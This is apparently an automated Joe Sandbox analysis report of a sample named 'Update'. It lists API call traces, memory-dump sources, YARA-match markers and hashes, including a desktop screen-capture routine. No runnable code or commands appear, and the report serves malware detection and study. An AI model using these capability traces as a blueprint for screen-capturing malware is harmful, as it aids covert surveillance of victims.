• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
• String ID:
• API String ID: 1600138625-0
APIs
• GetConsoleMode.KERNEL32(0000000C,?,?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0B81
• GetLastError.KERNEL32(?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0B8D
  • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
• ___initconin.LIBCMT ref: 6C3A0B9D
  • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
• GetConsoleMode.KERNEL32(0000000C,?,6C3934A7,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BAB
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
• String ID:
• API String ID: 3067319862-0
                                                                                            APIs
                                                                                            • SetConsoleMode.KERNEL32(0000000C,00000000,?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BC7
                                                                                            • GetLastError.KERNEL32(?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BD3
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0BE3
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • SetConsoleMode.KERNEL32(0000000C,?,6C3934AF,00000000,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0BF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID:
                                                                                            • API String ID: 3067319862-0
                                                                                            • Opcode ID: d5ebf62f180524b13fd9d9f5ada6e66f2350462f7a58271f74ad017209ad86cc
                                                                                            • Instruction ID: 8bc376526212c841d4bdaded6be3aaa429b3a3082e740e6bb414a8af7c9da736
                                                                                            • Opcode Fuzzy Hash: d5ebf62f180524b13fd9d9f5ada6e66f2350462f7a58271f74ad017209ad86cc
                                                                                            • Instruction Fuzzy Hash: E9E0BF366411546FCF212BD9DD089C93E79EB963B97050160F90AE7610DA22C8A19FE5
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0304997F
                                                                                              • Part of subcall function 0304F032: __FF_MSGBANNER.LIBCMT ref: 0304F04B
                                                                                              • Part of subcall function 0304F032: __NMSG_WRITE.LIBCMT ref: 0304F052
                                                                                            • _memcpy_s.LIBCMT ref: 03049B42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc_memcpy_s
                                                                                            • String ID: &
                                                                                            • API String ID: 3561290194-3042966939
                                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                            • Instruction ID: 466eb5a5026a7a65bcd3b1e9106ad81e8bb7650af24fe7e2871b13106da45636
                                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                            • Instruction Fuzzy Hash: FFC141F1A012199BDB64DF55CCC0BAAB7F8EB88300F1485BDD609A7241D774AE85CF94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldiv
                                                                                            • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 3732870572-1956417402
                                                                                            • Opcode ID: e0cb8158399e100eb13fa67edbd6ccb59492ee29cc2e6f1be0719e68c99e68e5
                                                                                            • Instruction ID: 41aa758a1bcb2f47f6d9036cf6acc78576af9974691ab2dd39d693d4cbde6bc2
                                                                                            • Opcode Fuzzy Hash: e0cb8158399e100eb13fa67edbd6ccb59492ee29cc2e6f1be0719e68c99e68e5
                                                                                            • Instruction Fuzzy Hash: 60611770E0624BAFDB118EA9CC807AEBBF9AF4630CF244099D4909FB50D73599498F61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset_wcsrchr
                                                                                            • String ID: D
                                                                                            • API String ID: 1675014779-2746444292
                                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                            • Instruction ID: f3ad6dc004ea0431a3820f72c05700246d95b08a9744dafee62ae1e99187bfab
                                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                            • Instruction Fuzzy Hash: 0231E9B69412187BE720E7A4AC89FFF776CEB84710F140125FB0A9A1C0DA719A46C6E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __alloca_probe_16__freea
                                                                                            • String ID: gfff
                                                                                            • API String ID: 1635606685-1553575800
                                                                                            • Opcode ID: 56cbbee33a8e33ec81e3e7348b444f51fbd23544890294a15346105f538ccdba
                                                                                            • Instruction ID: da3a4b77ff517397a62b562899e5e1770782366282d246b815629693c19c1fb9
                                                                                            • Opcode Fuzzy Hash: 56cbbee33a8e33ec81e3e7348b444f51fbd23544890294a15346105f538ccdba
                                                                                            • Instruction Fuzzy Hash: 0A3138F6A016119BDB509BA9C880A9FB7B8DF45B2CB210629C86CD7F40F732D9058F91
                                                                                            APIs
                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6C399FC8,?,?,00000000,00000000,00000000,?), ref: 6C39A0EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 2118026453-2084237596
                                                                                            • Opcode ID: 8e5eb93fb80531f1c4c46fb9c5622f9df424b84c5c68bbabcad7ad15a757a13a
                                                                                            • Instruction ID: b5573132e1f815564ed2933f8477c69a626a83aed14d2cdd0c64bbeb171e8199
                                                                                            • Opcode Fuzzy Hash: 8e5eb93fb80531f1c4c46fb9c5622f9df424b84c5c68bbabcad7ad15a757a13a
                                                                                            • Instruction Fuzzy Hash: BA417872E01209AFCF05CF94CC80AEEBBB5FF48308F148259E915A7611E736A950DF91
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C3730E6
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C373222
                                                                                              • Part of subcall function 6C38B0F3: _Yarn.LIBCPMT ref: 6C38B113
                                                                                              • Part of subcall function 6C38B0F3: _Yarn.LIBCPMT ref: 6C38B137
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                            • String ID: bad locale name
                                                                                            • API String ID: 2070049627-1405518554
                                                                                            • Opcode ID: 06b834f8c5c5cd12d8e8098583cee16e8dd84ce9304339251b8cbd6ce7064cc5
                                                                                            • Instruction ID: 8318f4003a9b3738431096e7c54f36ac3d9af544e8d3bde557f5978c146e7abd
                                                                                            • Opcode Fuzzy Hash: 06b834f8c5c5cd12d8e8098583cee16e8dd84ce9304339251b8cbd6ce7064cc5
                                                                                            • Instruction Fuzzy Hash: 22414DF1A017459BEB20DF69D814757BBE8BF04708F004528E4999BB80E77AE518CFE6
                                                                                            APIs
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C399BAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___except_validate_context_record
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3493665558-3733052814
                                                                                            • Opcode ID: b2fe6a01613e97c4ac754c421453100dbcd3a0a6c2c8cc90d6847e51bca67214
                                                                                            • Instruction ID: aeefb7d5ede59c06db5eb1e8e1f4669be6365b8ab777ce2c21359c83d1dd23e6
                                                                                            • Opcode Fuzzy Hash: b2fe6a01613e97c4ac754c421453100dbcd3a0a6c2c8cc90d6847e51bca67214
                                                                                            • Instruction Fuzzy Hash: 0031C472415318AFCF12AF55CC4099A3BAAFF09319B18425AFC5C49620E337C8A1DFD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: Y.7l$ios_base::badbit set
                                                                                            • API String ID: 4218353326-2685304014
                                                                                            • Opcode ID: 2ba67ad5ab615baa55b81c8a8bb1c39593a444877ceefda0ae20bb14b21125a6
                                                                                            • Instruction ID: 8bac72f75dae20e9779ed14a6c0d27db7de710056b327e895e335e040bb91418
                                                                                            • Opcode Fuzzy Hash: 2ba67ad5ab615baa55b81c8a8bb1c39593a444877ceefda0ae20bb14b21125a6
                                                                                            • Instruction Fuzzy Hash: 683181B2C00258DBDB10DFA4D944BDEBBB5EB48324F140229E844A7781E33A5A94CBB5
                                                                                            APIs
                                                                                              • Part of subcall function 034EBC70: GetDesktopWindow.USER32 ref: 034EBC8F
                                                                                              • Part of subcall function 034EBC70: GetDC.USER32(00000000), ref: 034EBC9C
                                                                                              • Part of subcall function 034EBC70: CreateCompatibleDC.GDI32(00000000), ref: 034EBCA2
                                                                                              • Part of subcall function 034EBC70: GetDC.USER32(00000000), ref: 034EBCAD
                                                                                              • Part of subcall function 034EBC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 034EBCBA
                                                                                              • Part of subcall function 034EBC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 034EBCC2
                                                                                              • Part of subcall function 034EBC70: ReleaseDC.USER32(00000000,00000000), ref: 034EBCD3
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004C), ref: 034EBD78
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004D), ref: 034EBD8D
                                                                                              • Part of subcall function 034EBC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 034EBDA6
                                                                                              • Part of subcall function 034EBC70: SelectObject.GDI32(?,00000000), ref: 034EBDB4
                                                                                              • Part of subcall function 034EBC70: SetStretchBltMode.GDI32(?,00000003), ref: 034EBDC0
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004F), ref: 034EBDCD
                                                                                              • Part of subcall function 034EBC70: GetSystemMetrics.USER32(0000004E), ref: 034EBDE0
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • _memset.LIBCMT ref: 034EB1E1
                                                                                            • swprintf.LIBCMT ref: 034EB204
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                            • String ID: %s %s
                                                                                            • API String ID: 1028806752-581060391
                                                                                            • Opcode ID: e1fd35b98158eb5c773c24207cf71520b8eb345407160609fdcc546528d4adf0
                                                                                            • Instruction ID: 98f934b32774721bd4c1291741fef947d6cea4d84c657ef26eaa36bb8bfe8fd8
                                                                                            • Opcode Fuzzy Hash: e1fd35b98158eb5c773c24207cf71520b8eb345407160609fdcc546528d4adf0
                                                                                            • Instruction Fuzzy Hash: 5B21F6B6904340AFD210EB16EC84E5FB7E8EFD9711F08092FF8895E241E6719908C7A7
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9115
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9128
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                            • String ID: string too long
                                                                                            • API String ID: 963545896-2556327735
                                                                                            • Opcode ID: 0af2d7c67cded4a3c5b21a6acd28829c766af110b54555b96c3fd50b7dd3b08e
                                                                                            • Instruction ID: 2d1e89eefc07496a9feb6e0e63ba22a7faf475616d2b3f91f00eca0af384557a
                                                                                            • Opcode Fuzzy Hash: 0af2d7c67cded4a3c5b21a6acd28829c766af110b54555b96c3fd50b7dd3b08e
                                                                                            • Instruction Fuzzy Hash: 951190793043409BD321CA2DE804A1AF7E9ABA6662F140A6FE1918F7C1D776D805C7A9
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBCMT ref: 034E941D
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E944A
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 034E9445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                            • String ID: invalid string position
                                                                                            • API String ID: 3614006799-1799206989
                                                                                            • Opcode ID: 16765fd332f278d70ade1c68342eec362e40e823924a6e5ebe5ea7be2465d352
                                                                                            • Instruction ID: f7b9e342b875dee7f7fe2cedae5381c82af54a00b4d510be3b08bbda544d2bb7
                                                                                            • Opcode Fuzzy Hash: 16765fd332f278d70ade1c68342eec362e40e823924a6e5ebe5ea7be2465d352
                                                                                            • Instruction Fuzzy Hash: 110126336043006FC724EE68D88078AF399AF40622F150A2FE1629F6C0D7B5E984C7E9
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 00916FFC
                                                                                              • Part of subcall function 009170E4: __getptd_noexit.LIBCMT ref: 009170E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                            • Instruction ID: 555a97c323d97fa906f7fd1265ad58273d2d6992c7c2b48b8644be67c74e5df0
                                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                            • Instruction Fuzzy Hash: E201AD72E0420E9BDF009FA4CC01BEEBBF9FB48364F000155F924A6281D7749541DBA1
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 034EF815
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                            • Instruction ID: ebf5dfe5fffad52fbf457f0b6d27544afa233645952327de7d154a51ac9274bc
                                                                                            • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                            • Instruction Fuzzy Hash: 12018075A002499FDF00DFA5DC01BFEBBB8FB04364F15411AE924AE280E7749505DBB9
                                                                                            APIs
                                                                                            • __output_l.LIBCMT ref: 0304F1D4
                                                                                              • Part of subcall function 0304F2DA: __getptd_noexit.LIBCMT ref: 0304F2DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__output_l
                                                                                            • String ID: B
                                                                                            • API String ID: 2141734944-1255198513
                                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                            • Instruction ID: 96b264fe1e82c0521e20e27ce6d70061610ae8f426dd5d375e262f67e4048854
                                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                            • Instruction Fuzzy Hash: 700180B5E0120AABDF10DFA8CC01BEEBBF8FB44364F144125F824AA290D7749601CBB1
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E957F
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • _memmove.LIBCMT ref: 034E95B5
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 034E957A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: invalid string position
                                                                                            • API String ID: 1785806476-1799206989
                                                                                            • Opcode ID: 2ddc333418841b9c0091b11b10888a2bb55325350fdec26b8a8b1ec561b7ba84
                                                                                            • Instruction ID: c6cf99d56a38d59e0efd4c436779b1d38845bae8f69134aa5116d1cca0781333
                                                                                            • Opcode Fuzzy Hash: 2ddc333418841b9c0091b11b10888a2bb55325350fdec26b8a8b1ec561b7ba84
                                                                                            • Instruction Fuzzy Hash: 9E018F327003018FD765CA6CED9462AB3A69BC55027280E2ED0A1CF789D7B5DC424798
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034ED1D4
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • _memmove.LIBCMT ref: 034ED20D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: vector<T> too long
                                                                                            • API String ID: 1785806476-3788999226
                                                                                            • Opcode ID: 67781ebbd527d3778379e04bbf6d574d6898bde765d6e2cf0d43d02bd9953042
                                                                                            • Instruction ID: 1f31096de1d3540f6bab67d71cc44d83b5d8f6a3405fff93e2552c59349eea7e
                                                                                            • Opcode Fuzzy Hash: 67781ebbd527d3778379e04bbf6d574d6898bde765d6e2cf0d43d02bd9953042
                                                                                            • Instruction Fuzzy Hash: 6D01DD769006135FC710EFADE881C3E7B98E741252349037FDE11C7718D775A91A9754
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E8443
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            • _memmove.LIBCMT ref: 034E846E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: vector<T> too long
                                                                                            • API String ID: 1785806476-3788999226
                                                                                            • Opcode ID: 0e7e7784445a183172f4489216a3f454b77f05fb097c06c81bf7871b4e3cc1c5
                                                                                            • Instruction ID: 3c191ddcea6195292e4836599f59fb0c8776292c486dc97ea84cb44671666bbd
                                                                                            • Opcode Fuzzy Hash: 0e7e7784445a183172f4489216a3f454b77f05fb097c06c81bf7871b4e3cc1c5
                                                                                            • Instruction Fuzzy Hash: 2D01A2B26003099FDB24DFA9DC9193BB3E8EB54616318492EE496CB340E630F840CB64
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
